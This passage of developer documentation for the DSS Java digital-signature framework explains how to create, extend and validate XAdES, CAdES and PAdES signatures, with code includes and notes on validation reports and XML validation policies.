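A hedged configuration sketch of these four sources is shown below (the class names come from the dss-spi and dss-service modules; the exact setter names may vary slightly between DSS versions, and the certificate sources are left empty for brevity):\n\n[source,java]\n----\nimport eu.europa.esig.dss.service.crl.OnlineCRLSource;\nimport eu.europa.esig.dss.service.ocsp.OnlineOCSPSource;\nimport eu.europa.esig.dss.spi.x509.CommonCertificateSource;\nimport eu.europa.esig.dss.spi.x509.CommonTrustedCertificateSource;\nimport eu.europa.esig.dss.validation.CommonCertificateVerifier;\n\n\/\/ The four sources of information described above:\nCommonCertificateVerifier certificateVerifier = new CommonCertificateVerifier();\ncertificateVerifier.setTrustedCertSources(new CommonTrustedCertificateSource()); \/\/ trust anchors\ncertificateVerifier.setAdjunctCertSources(new CommonCertificateSource()); \/\/ intermediate certificates\ncertificateVerifier.setOcspSource(new OnlineOCSPSource());\ncertificateVerifier.setCrlSource(new OnlineCRLSource());\n----\n\n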
===== Signing process\n\nOnce the parameters of the signature have been identified, the service object itself must be created. The service used will depend on the type of document to sign. In our case it is an XML file, so we will instantiate a XAdES service. The process of signing takes place in three stages. The first is the `getDataToSign()` method call, passing as a parameter the document to be signed and the previously selected settings. This step returns the data which is going to be digested and encrypted. In our case it corresponds to the SignedInfo XMLDSig element. \n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=demoSigningProcessGetDataToSign]\n----\n\nThe next step is a call to the function `sign()` which is invoked on the object token representing the KeyStore and not on the service. This method takes three parameters. The first is the array of bytes that must be signed. It is obtained by the previous method invocation. The second is the algorithm used to create the digest. You have the choice between SHA1, SHA256, and SHA512 (this list is not exhaustive). And the last one is the private key entry.\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=demoSigningProcessSign]\n----\n\nThe last step of this process is the integration of the signature value in the signature and linking it to the signed document based on the selected packaging method. This is the method `signDocument()` on the service. We must pass to it three parameters: again the document to sign, the signature parameters and the value of the signature obtained in the previous step.\n\nThis separation into three steps allows use cases where different environments have their precise responsibilities: specifically the distinction between communicating with the token and executing the business logic.\n\nWhen the breakdown of this process is not necessary, then a simple call to a single method can be done as in the following example:\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=demoSigningProcessSignDocument]\n----\n\n===== Additional attributes\n\nFor this type (XAdES-BASELINE-B) of signature it is possible to identify some additional attributes.\n\n[[SignXmlXadesBPropertiesTest.java]]\n[source,java,indent=0]\n.XAdES signature with additional signed attributes\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBPropertiesTest.java[tags=demo]\n----\n\nIn the XAdES format the following types of Content Timestamp can be used:\n\n * AllDataObjectsTimeStamp - each time-stamp token within this property covers the full set of references defined in the Signature's SignedInfo element, excluding references of type \"SignedProperties\".\n * IndividualDataObjectsTimeStamp - each time-stamp token within this property covers selected signed data objects.\n\nThe code above produces the following signature :\n\n.XAdES signature example\ninclude::_samples\/xades-b-properties.adoc[]\n\n==== XAdES-BASELINE-T\n\nXAdES-BASELINE-T is a signature for which there exists a trusted time associated with the signature. It provides the initial steps towards providing long term validity and, more specifically, it provides a protection against repudiation. This extension of the signature can be created during the generation process as well as during the validation process. However, the case when these validation data are not added during the generation process should no longer occur. The XAdES-BASELINE-T trusted time indications must be created before the signing certificate has been revoked or expired and close to the time that the XAdES signature was produced. The XAdES-BASELINE-T form must be built on a XAdES-BASELINE-B form. The DSS framework allows extending the old -BES and -EPES profiles to the new BASELINE-T profile; indeed, there is no difference in the structure of the signature.\n\nTo implement this profile of signature you must indicate to the service the TSA source, which delivers for each Timestamp Request a Timestamp Response (RFC 3161 (cf. <<R08>>)) containing tokens. 
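A minimal wiring sketch is shown below (the TSA URL is a placeholder, and `certificateVerifier` is assumed to be configured as shown earlier):\n\n[source,java]\n----\nimport eu.europa.esig.dss.service.tsp.OnlineTSPSource;\nimport eu.europa.esig.dss.xades.signature.XAdESService;\n\n\/\/ Without a TSP source the service cannot produce a -T level signature.\nXAdESService service = new XAdESService(certificateVerifier);\nservice.setTspSource(new OnlineTSPSource(\"http:\/\/tsa.example.com\/timestamp\"));\n----\n\n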
Below is the source code that creates a XAdES-BASELINE-T signature. For our example, we will use the Belgian provider and an instance of OnlineTSPSource (see the \"TSP Sources\" chapter for more details).\n\n[source,java,indent=0]\n.Create a XAdES-Baseline-T with an OnlineTSPSource\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesTWithOnlineSourceTest.java[tags=demo]\n----\n\nIf the timestamp source is not set, a NullPointerException is thrown.\n\nThe SignatureTimeStamp mandated by the XAdES-T form appears as an unsigned property within the QualifyingProperties:\n\n.XAdES Signature Timestamp\ninclude::_samples\/xades-signature-timestamp.adoc[]\n\n==== XAdES-BASELINE-LT\n\nThis level has to prove that the certification path was valid, at the time of the validation of the signature, up to a trust point, according to the naming constraints and the certificate policy constraints from the \"Signature Validation Policy\". It will add to the signature the CertificateValues and RevocationValues unsigned properties. The CertificateValues element contains the full set of certificates that have been used to validate the electronic signature, including the signer's certificate. However, it is not necessary to include one of those certificates if it is already present in the ds:KeyInfo element of the signature. This is how the DSS framework behaves. In order to find the list of all the certificates and the list of all revocation data, an automatic process of signature validation is executed. To carry out this process an object called CertificateVerifier must be passed to the service. The implementer must set some of its properties (e.g. a source of trusted certificates). The code below shows how to use the default parameters with this object. Please refer to \"The Signature Validation\" chapter for further information. It also includes an example of how to implement this level of signature:\n\n[[SignXmlXadesLTTest.java]]\n[source,java,indent=0]\n.SignXmlXadesLTTest.java\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesLTTest.java[tags=demo]\n----\n\nThe following XML segment will be added to the signature qualified and unsigned properties:\n\n.Validation data values\ninclude::_samples\/xades-revocation-data.adoc[]\n\nNOTE: The use of online sources can significantly increase the execution time of the signing process. For testing purposes you can create your own source of data.\n\nIn the last example the CommonsDataLoader is used to provide the communication layer for the HTTP protocol. Each source which needs to go through the network to retrieve data needs to have this component set.\n\n==== XAdES-BASELINE-LTA\n\nWhen the cryptographic data becomes weak and the cryptographic functions become vulnerable, the auditor should take steps to maintain the validity of the signature. The XAdES-BASELINE-A form uses a simple approach called \"archive validation data\". It adds additional time-stamps for archiving signatures in a way that they are still protected, but also to be able to prove that the signatures were validated at the time when the used cryptographic algorithms were considered safe. The time-stamping process may be repeated every time the protection used becomes weak. Each time-stamp needs to be affixed before either the signing key or the algorithms used by the TSA are no longer secure. 
XAdES-A form adds the ArchiveTimestamp element within the UnsignedSignatureProperties and may contain several ArchiveTimestamp elements.\n\nBelow is an example of the implementation of this level of signature (but in practice, we will rather extend the signature to this level when there is a risk that the cryptographic functions become vulnerable or when one of the certificates approaches its expiration date):\n\n[source,java,indent=0]\n.Signature level setting\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=demoSignatureLevel]\n----\n\nThe following XML segment will be added to the signature qualified and unsigned properties:\n\n.XAdES Archive Timestamp\ninclude::_samples\/xades-archive-timestamp.adoc[]\n\n=== Versions support\n\nDSS supports the following XAdES formats :\n\n[cols=\"5*^\"]\n.Supported XAdES versions\n|===\n| | B-level | T-level | LT-level | LTA-level\n\n| XAdES 1.1.1 | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:times-circle[role=\"red\"]\n\n| XAdES 1.2.2 | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:times-circle[role=\"red\"]\n\n| XAdES 1.3.2 | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"]\n\n| XAdES 1.4.1 4+| The format contains qualifying properties for XAdES 1.3.2 LTA level\n|===\n\nThe XAdES profile, as well as customizable prefixes, can be set with the following methods :\n\n[source,java,indent=0]\n.XAdES formats and prefixes\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBWithTransformsTest.java[tags=demoPrefixes]\n----\n\n=== Reference Transformations\n\nIn the case of 'Enveloping', 'Enveloped' and 'Internally Detached' signatures, it is possible to apply custom transformations for signing references in order to compute the proper digest result. An example of defining reference transformations can be found below:\n\n[[SignXmlXadesBWithTransformsTest.java]]\n[source,java,indent=0]\n.Custom transformations definition\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBWithTransformsTest.java[tags=demo]\n----\n\nThe current version of DSS supports the following transformations:\n\n * Enveloped - removes the current `Signature` element from the digest calculation of the reference.\n\nWARNING: The Enveloped Signature Transform does not support parallel signatures!\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBWithTransformsTest.java[tags=demoEnvelopedTransform]\n----\n\n * Canonicalization - any canonicalization algorithm that can be used for 'CanonicalizationMethod' can be used as a transform:\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBWithTransformsTest.java[tags=demoCanonicalizationTransform]\n----\n\n * Base64 - the transform is used if the application needs to sign RAW data (binaries, images, audio or other formats). 
The 'Base64 Transform' is not compatible with following signature parameters:\n\n ** Reference contains more than one transform (must be a sole element of the reference transforms);\n ** setEmbedXML(true) - embedded setting cannot be used;\n ** setManifestSignature(true) - As is apparent from the previous point, Manifest cannot be used with the Base64 Transform as well since it also must be embedded to the signature.\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBWithTransformsTest.java[tags=demoBase64Transform]\n----\n\n * XPath - allows signing a custom nodes in a signature or embedded document. DSS contains an additional class `XPathEnvelopedSignatureTransform` allowing to exclude signatures from the digested content (used for Enveloped signatures by default). Additional information about the 'XPath Transform' can be found https:\/\/www.w3.org\/TR\/xpath20\/[by the link].\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBWithTransformsTest.java[tags=demoEnvelopedXPathTransform]\n----\n\n * XPath-2-Filter - an alternative to 'XPath Transform'. Additional information about the 'XPath2Filter Transform' can be found https:\/\/www.w3.org\/TR\/xmldsig-filter2\/[by the link]. DSS contains an additional class `XPath2FilterEnvelopedSignatureTransform` allowing to exclude signatures from the digest calculation.\n\nNOTE: Since DSS 5.7 the XPath-2-Filter transform is used by default for ENVELOPED signature packaging.\n\n[source,java,indent=0]\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlXadesBWithTransformsTest.java[tags=demoEnvelopedXPath2FilterTransform]\n----\n\n * XSLT Transform - This transform requires a 'org.w3.dom.Document' as an input, compatible with the normative https:\/\/www.w3.org\/TR\/xslt-30\/[XSLT Specification]. Must be a sole transform.\n\nNOTE: All transformations, except Base64, can be applied only to XML objects.\n\n=== Multiple signatures\n\nIn everyday life, there are many examples where it is necessary to have multiple signatures covering the same document, such as a contract to purchase a vehicle. Independent signatures are parallel signatures where the ordering of the signatures is not important. The computation of these signatures is performed on exactly the same input but using different private keys.\n\n=== XAdES and specific schema version\n\nSome signatures may have been created with an older version of XAdES standard using different schema definition. To take into account the validation of such signatures the interface eu.europa.esig.dss.xades.definition.XAdESPaths was created. This interface allows to provide the different needed XPath expressions which are used to explore the elements of the signature. The DSS framework proposes 3 implementations : \n\n * XAdES132Paths (XAdES 1.3.2 \/ 1.4.1)\n * XAdES122Paths (XAdES 1.2.2)\n * XAdES111Paths (XAdES 1.1.1)\n\nBy default, all XAdES are supported and DSS loads\/parses all versions of XAdES. 
That's possible to restrict to only one version of XAdES with the following code : \n\n[source,java,indent=0]\n.Customize the supported XAdES version(s) at the validation\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/validate\/XAdES132OnlyTest.java[tags=demo]\n----\n\n=== Sign a Trusted List\n\nThe standard ETSI TS 119 612 specifies in its annex B the XML structure and the format of the signature (XAdES, enveloped signature, transformation, canonicalization, etc.). With the class `TrustedListSignatureParametersBuilder`, DSS is able to pre-configure the signature parameters to comply with the specifications and simplify the signature creation.\n\n[source,java,indent=0]\n.Sign a Trusted List with the TrustedListSignatureParametersBuilder\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignTrustedListTest.java[tags=demo]\n----\n\n== Signature Extension\n\nThe -B level contains immutable signed properties. Once this level is created, these properties cannot be changed.\n\nThe levels -T\/-LT\/-LTA add unsigned properties to the signature. This means that the properties of these levels could be added afterwards to any AdES signature. This addition helps to make the signature more resistant to cryptographic attacks on a longer period of time. The extension of the signature is incremental, i.e. when you want to extend the signature to the level -LT the lower level (-T) will also be added. The whole extension process is implemented by reusing components from signature production. To extend a signature we proceed in the same way as in the case of a signature, except that you have to call the function \"extendDocument\" instead of the \"sign\" function. Note that when the document is signed with several signatures then they are all extended.\n\n=== BASELINE-T\n\nThe AdES-BASELINE-T trusted time indications have to be created before a certificate has been revoked or expired and close to the time that the AdES signature was produced. It provides a protection against repudiation. The framework adds the timestamp only if there is no timestamp or there is one but the creation of a new extension of the level-T is deliberate (using another TSA). It is not possible to extend a signature which already incorporates higher level as -LT or -LTA. In the theory it would be possible to add another -T level when the signature has already reached level -LT but the framework prevents this operation. Note that if the signed document contains multiple signatures, then all the signatures will be extended to level -T. It is also possible to sign a document directly at level -T.\n\nHere is an example of creating an extension of type T:\n\n[source,java,indent=0]\n.Extend a XAdES signature\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/ExtendSignXmlXadesBToTTest.java[tags=demo]\n----\n\nHere is the result of adding a new extension of type-T to an already existing -T level signature:\n\n.XAdES Unsigned Signature Properties\ninclude::_samples\/xades-extend-t-to-t.adoc[]\n\n=== BASELINE-LT and -LTA\n\nFor these types of extensions, the procedure to follow is the same as the case of the extension of type T. 
Please refer to the chapter XAdES Profiles to know specific parameters for each level of signature and which must be positioned.\n\n[[signatureValidation]]\n== Signature Validation\n\nGenerally and following ETSI standard, the validation process of an electronic signature must provide one of these three following statuses: TOTAL-FAILED, TOTAL-PASSED or INDETERMINATE. A TOTAL-PASSED response indicates that the signature has passed verification and it complies with the signature validation policy. A TOTAL_FAILED response indicates that either the signature format is incorrect or that the digital signature value fails the verification. An INDETERMINATE validation response indicates that the format and digital signature verifications have not failed but there is an insufficient information to determine if the electronic signature is valid. For each of the validation checks, the validation process must provide information justifying the reasons for the resulting status indication as a result of the check against the applicable constraints. In addition, the ETSI standard defines a consistent and accurate way for justifying statuses under a set of sub-indications.\n\n===\tValidation Process\n\nSince version 4.7 of the DSS framework the validation process is based on the latest ETSI standard <<R09>>. It is driven by the validation policy and allows long term signature validation. It not only verifies the existence of certain data and their validity, but it also checks the temporal dependences between these elements. The signature check is done following basic building blocks. On the simplified diagram below, showing the process of the signature validation, you can follow the relationships between each building block which represents a logic set of checks used in validation process.\n\n.Signature Validation Process\nimage::sig_validation_process.jpg[]\n\nNote that the current version of the framework during the validation process does not indicate what part of a document was signed. However, in a case of XAdES signature XPath transformations presented in the signature will be applied, in the case of CAdES or PAdES signature the whole document must be signed.\n\nAt the end of the validation process four reports are created. They contain the different detail levels concerning the validation result. They provide four kinds of visions for the validation process: macroscopic, microscopic, input data and ETSI Validation report conformant with the standard <<R09>>. For more information about these reports, please refer to \"Simple Report\" chapter.\n\nBelow is the simplest example of the validation of the signature of a document. The first thing to do is instantiating an object named validator, which orchestrates the verification of the different rules. To perform this it is necessary to invoke a static method fromDocument() on the abstract class `SignedDocumentValidator`. This method returns the object in question whose type is chosen dynamically based on the type of source document. \n\nThe next step is to create an object that will check the status of a certificate using the Trusted List model (see \"Trusted Lists of Certification Service Provider\" for more information). In order to achieve this, an instance of a `CertificateVerifier` must be created with a defined source of trusted certificates. In our example, the trusted source is instantiated with `CommonTrustedCertificateSource` class. 
As well as a trusted source the CertificateVerifier object needs an OCSP and\/or CRL source and a TSL source (which defines how the certificates are retrieved from the Trusted Lists). See chapter \"Management of CRL and OCSP Sources\" for more information concerning sources.\n\n[source,java,indent=0]\n.Validation of a signature\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/validate\/ValidateSignedXmlXadesBTest.java[tags=demo]\n----\n\nNOTE: When using the TrustedListsCertificateSource class, for performance reasons, consider creating a single instance of this class and initialize it only once.\n\nNOTE: In general, the signature must cover the entire document so that the DSS framework can validate it. However, for example in the case of a XAdES signature, some transformations can be applied on the XML document. They can include operations such as canonicalization, encoding\/decoding, XSLT, XPath, XML schema validation, or XInclude. XPath transforms permit the signer to derive an XML document that omits portions of the source document. Consequently those excluded portions can change without affecting signature validity. \n\n[[signedDocumentValidator]]\n==== SignedDocumentValidator\n\nFor execution of the validation process, DSS uses the 'SignedDocumentValidator' class. The DSS framework provides five implementations of validator:\n \n * `XMLDocumentValidator` - validates documents in XML format (XAdES format);\n * `CMSDocumentValidator` - validates documents in CMS format (CAdES format);\n * `PDFDocumentValidator` - validates documents in PDF format (PADES format);\n * `JWSCompactDocumentValidator` - validates documents with base64url encoded content (JAdES compact format);\n * `JWSSerializationDocumentValidator` - validates documents in JSON format (JAdES serialization formats);\n * `ASiCContainerWithXAdESValidator` - validates ASiC with XAdES containers;\n * `ASiCContainerWithCAdESValidator` - validates ASiC with CAdES containers;\n * `DetachedTimestampValidator` - validates CMS timestamps provided alone.\n\nDSS initializes a relevant validator based on specific characteristics of an input file (e.g. a PDF file version declaration for a PDF file). It checks the file format and loads the required validator from a classpath. Below you can find a list of settings that can be used for the configuration of the class.\n\n[source,java,indent=0]\n.SignedDocumentValidator usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/SignedDocumentValidatorTest.java[tags=demo]\n----\n\n===\tValidation Result Materials\n\nThe result of the validation process consists of three elements: \n\n * the Simple Report, \n * the Detailed Report,\n * the Diagnostic Data and\n * the ETSI Validation Report.\n \nAll these reports are encoded using XML, which allows the implementer to easily manipulate and extract information for further analysis. For each report, XML Schema and JaxB model are available as maven dependencies.\n\nDSS also provides XSLT to able to generate PDF or HTML reports (simple and detailed reports).\n\nYou will find below a detailed description of each of these elements.\n\n==== Simple Report \n\nThis is a sample of the simple validation report:\n\n.Simple Report \ninclude::_samples\/simple-report-example.adoc[]\n\nThe result of the validation process is based on very complex rules. The purpose of this report is to make as simple as possible the information while keeping the most important elements. 
Thus the end user can, at a glance, have a synthetic view of the validation. To build this report the framework uses some simple rules and the detailed report as input.\n\n==== Detailed Report\n\nThis is a sample of the detailed validation report. Its structure is based on the ETSI standard <<R09>> and is built around Basic Building Blocks, Basic Validation Data, Timestamp Validation Data, AdES-T Validation Data and Long Term Validation Data. Some segments were deleted to make reading easier. They are marked by three dots:\n\n.Detailed Report \ninclude::_samples\/detailed-report-example.adoc[]\n\nFor example the Basic Building Blocks are divided into seven elements:\n\n * FC - Format Checking\n * ISC - Identification of the Signing Certificate\n * VCI - Validation Context Initialization\n * RFC - Revocation Freshness Checker\n * XCV - X.509 certificate validation\n * CV - Cryptographic Verification\n * SAV - Signature Acceptance Validation\n \nThe following additional elements also can be executed in case of validation in the past : \n\n * PCV - Past Certificate Validation\n * VTS - Validation Time Sliding process\n * POE extraction - Proof Of Existence extraction \n * PSV - Past Signature Validation\n\nPast certificate\/signature validation is used when basic validation of a certificate\/signature fails at the current time with an INDETERMINATE status such that the provided proofs of existence may help to go to a determined status. The process shall initialize the _best-signature-time_ either to a time indication for a related POE provided, or the current time when this parameter has not been used by the algorithm.\n\n * *Best-signature-time* is an internal variable for the algorithm denoting the earliest time when it can be trusted by the SVA (either because proven by some POE present in the signature or passed by the DA and for this reason assumed to be trusted) that a signature has existed. <<R09>>\n\nEach block contains a number of rules that are executed sequentially. The rules are driven by the constraints defined in the validation policy. The result of each rule is OK or NOT OK. The process is stopped when the first rule fails. Each block also contains a conclusion. If all rules are met then the conclusion node indicates PASSED. Otherwise FAILED or INDETERMINATE indication is returned depending on the ETSI standard definition. \n\n==== Diagnostic Data\n\nThis is a data set constructed from the information contained in the signature itself, but also from information retrieved dynamically as revocation data and information extrapolated as the mathematical validity of a signature. All this information is independent of the applied validation policy. Two different validation policies applied to the same diagnostic data can lead to different results.\n\nThis is an example of the diagnostic data for a XAdES signature. Certain fields and certain values were trimmed or deleted to make reading easier:\n\n.Diagnostic Data\ninclude::_samples\/diagnostic-data-example.adoc[]\n\n==== ETSI Validation Report\n\nThe ETSI Validation Report represents an implementation of TS 119 102-2 (cf. <<R13>>). The report contains a standardized result of an ASiC digital signature validation. 
It includes the original validation input data, the applied validation policy, as well as the validation result of one or more signature(s) and its(their) constraints.\n\nThis is an example of the ETSI validation report:\n\n.ETSI Validation Report (TS 119 102-2)\ninclude::_samples\/etsi-validation-report-example.adoc[]\n\n[[validationPolicy]]\n=== Validation Policy\n\nThe validation process may be driven by a set of constraints that are contained in the XML policy file.\n\nIn order to run a validation process with a custom validation policy, an XML file shall be created in compliance with the https:\/\/github.com\/esig\/dss\/blob\/master\/dss-policy-jaxb\/src\/main\/resources\/xsd\/policy.xsd[policy.xsd] schema and passed to the relevant `DocumentValidator` as shown below.\n\n[source,java,indent=0]\n.Custom validation policy\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=validationPolicy]\n----\n\n==== XML policy structure\n\nThe validation policy allows to define different behavior for various validating token types or signature formats. The following groups are considered:\n\n * `ContainerConstraints` - defines rules for processing of ASiC containers validation;\n * `SignatureConstraints` - defines rules for signature basic building blocks processing and the related certificate chain;\n * `CounterSignatureConstraints` - allows to define custom rules for counter signature processing;\n * `Timestamp` - defines rules for timestamp validation;\n * `Revocation` - defines rules for revocation data validation;\n * `Cryptographic` - defines common rules for cryptographic validation of used algorithms. The general constraints are used when no cryptographic constraints are defined for a particular token type;\n * `Model` - defines the way of a certificate chain processing;\n * `eIDAS` - defines rules for validation of Trusted Lists.\n\n==== Constraints\n\nEach constraint defined in the policy forces an execution of a relevant check in the validation process.\n\nNOTE: If a constraint is missing in the policy - the check is not processed.\n\nThe following constraint types are supported:\n\n * `LevelConstraint` - a simple constraint type with a defined processing `Level`;\n * `MultiValuesConstraint` - allows to define a set of accepted values relatively to the using constraint.\n\n==== Level\n\nThe `Level` attribute of a constraint defines a validation process behavior in case of a check failure. While used, the following behaviors apply in case of a check failure:\n\n * `FAIL` - brakes the validation process and returns the relevant indication;\n * `WARN` - continues the validation process and returns a warning message to the validation process output;\n * `INFORM` - continues the validation process and returns an information message to the validation process output;\n * `IGNORE` - processes the check in a silent mode (equivalent to a not defined constraint).\n\n==== Multi Values Constraint\n\nWhen using the `MultiValuesConstraint`, a list of acceptable values shall be defined in the list of `<Id>...<\/Id>` elements, one for each accepted value. 
While doing, the following rules apply:\n\n * Empty list of values -> accept only empty values for the item in question, fails otherwise;\n * `\"*\"` constraint value -> accepts all values, reject empty list of values;\n * Custom values -> accepts only item values matching the constraint.\n\n==== Cryptographic constraints\n\nCryptographic constraints define a list of acceptable cryptographic algorithms and their expiration dates when needed. The following settings are possible:\n\n * `AcceptableEncryptionAlgo` - defines a list of acceptable encryption algorithms. All tokens and signatures using other algorithms will be rejected.\n * `MiniPublicKeySize` - defines the minimal allowed public key size to be used with the defined encryption algorithms. An algorithm with a key size less than the defined one will be rejected. The minimal key size if required to be defined for an encryption algorithm, otherwise all used key sizes will be rejected.\n * `AcceptableDigestAlgo` - defines a list of acceptable digest algorithms. All tokens and signatures using other algorithms will be rejected.\n * `AlgoExpirationDate` - defines expiration dates for the algorithms. The algorithm is rejected when it is used after the defined date. If the algorithm expiration date is not defined, or set to null, the algorithm is treated as reliable for an unlimited time.\n\n==== The default XML policy\n\nThe default XML validation policy is present below.\n\n.constraint.xml (default policy is provided in dss-policy-jaxb module)\ninclude::_samples\/constraint.adoc[]\n\n== CAdES signature (CMS)\n\nTo familiarize yourself with this type of signature it is advisable to read the following document:\n\n* CAdES Specifications (cf. <<R02>>)\n\nTo implement this form of signature you can use the XAdES examples. You only need to instantiate the CAdES object service and change the SignatureLevel parameter value. Below is an example of the CAdES-Baseline-B signature:\n\n[source,java,indent=0]\n.Signing a file with CAdES\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignXmlCadesBTest.java[tags=demo]\n----\n\n== PAdES signature (PDF)\n\nThe standard ISO 32000-1 (cf. <<R06>>) allows defining a file format for portable electronic documents. It is based on PDF 1.7 of Adobe Systems. Concerning the digital signature it supports three operations: \n\n * Adding a digital signature to a document,\n * Providing a placeholder field for signatures,\n * Checking signatures for validity.\n\nPAdES defines eight different profiles to be used with advanced electronic signature in the meaning of European Union Directive 1999\/93\/EC (cf. <<R07>>):\n\n * PAdES Basic - PDF signature as specified in ISO 32000-1 (cf. <<R06>>). The profile is specified in ETSI EN 319 142 (cf. <<R03>>).\n * PAdES-BES Profile - based upon CAdES-BES as specified in ETSI EN 319 122 (cf. <<R02>>) with the option of a signature time-stamp (CAdES-T).\n * PAdES-EPES profile - based upon CAdES-EPES as specified in ETSI EN 319 122 (cf. <<R02>>). 
This profile is the same as the PAdES - BES with the addition of a signature policy identifier and optionally a commitment type indication.\n * PAdES-LTV Profile - This profile supports the long term validation of PDF Signatures and can be used in conjunction with the above-mentioned profiles.\n * Four other PAdES profiles for XML Content.\n\nTo familiarize yourself with this type of signature it is advisable to read the documents referenced above.\n\nBelow is an example of code to perform a PAdES-BASELINE-B type signature:\n\n[source,java,indent=0]\n.Signing a PDF file with PAdES\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBTest.java[tags=demo]\n----\n\nIn order to add a timestamp to the signature (PAdES-T or LTA), a TSP source must be provided to the service.\n\nTo create PAdES-BASELINE-B level with additional options: signature policy identifier and optionally a commitment type indication, please observe the following example in code 5.\n\nAll these parameters are optional.\n\n[source,java,indent=0]\n.Defining a Signature Policy\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBTest.java[tags=policy]\n----\n\nThe extension of a signature of the level PAdES-BASELINE-B up to PAdES-BASELINE-LTA profile will add the following features:\n\n * Addition of validation data to an existing PDF document which may be used to validate earlier signatures within the document (including PDF signatures and time-stamp signatures). \n * Addition of a document time-stamp which protects the existing document and any validation data. \n * Further validation data and document time-stamp may be added to a document over time to maintain its authenticity and integrity.\n\n=== PAdES Visible Signature\n\nThe framework also allows creation of PDF files with visible signature as specified in ETSI EN 319 142 (cf. <<R03>>). In the `SignatureParameters` object, there's a special attribute named `SignatureImageParameters`. This parameter allows you customize the visual signature (with text, with image or with image and text).\nBelow there is an example of code to perform a PADES-BASELINE-B type signature with a visible signature:\n\n[source,java,indent=0]\n.Add a visible signature to a PDF document\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBVisibleTest.java[tags=parameters-configuration;sign]\n----\n\nAdditionally, DSS also allows you to insert a visible signature to an existing field :\n\n[source,java,indent=0]\n.Add a visible signature to an existing field\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=select-pdf-signature-field]\n----\n\nIn case of placing an image or text to an existing field, the visible signature will fill out the whole available area of the field.\n\n==== Visible signature parameters (image and text)\n\nThis chapter introduces existing parameters for creation of visible signatures with DSS.\nDSS has three implementations for visible signature drawing:\n\n * *OpenPDF (iText)* - supports separate image and text drawing;\n * *PDFBox Default* - supports separate image and text drawing, as well as a joint drawing of image and text together. Transforms text to an image;\n * *PDFBox Native* - supports separate image and text drawing, as well as a joint drawing of image and text together. 
Prints text in a native way, that increases quality of the produced signature.\n\n===== Positioning\n\nDSS provides a set of functions allowing to place the signature field on a specific place in the PDF page :\n\n[source,java,indent=0]\n.Visible signature positioning\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/PAdESVisibleSignatureSnippet.java[tags=positioning]\n----\n\n===== Dimensions\n\nDSS framework provides a set of functions to manage the signature field size :\n\n[source,java,indent=0]\n.Visible signature dimensions\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/PAdESVisibleSignatureSnippet.java[tags=positioning]\n----\n\n===== Text Parameters\n\nThe available implementations allow placing of a visible text to a signature field :\n\n[source,java,indent=0]\n.List of available visible text parameters\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBVisibleTest.java[tags=text]\n----\n \n===== Text and image combination\n\nDSS provides a set of functions to align a text respectively to an image. The parameters must be applied to a 'SignatureImageTextParameters' object :\n\n[source,java,indent=0]\n.Combination of text and image parameters\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sign\/SignPdfPadesBVisibleTest.java[tags=textImageCombination]\n----\n \nThe result of applying the foregoing transformations is provided on the image below:\n\nimage::visual-sig-text-parameters.jpg[]\n\n==== Fonts usage\n\nSince version 5.5, DSS supports two types of fonts. The custom font must be added as an instance of `DSSFont` interface to a `SignatureImageTextParameters` object.\n`DSSFont` interface has following common implementations:\n\n * `DSSFileFont` for using 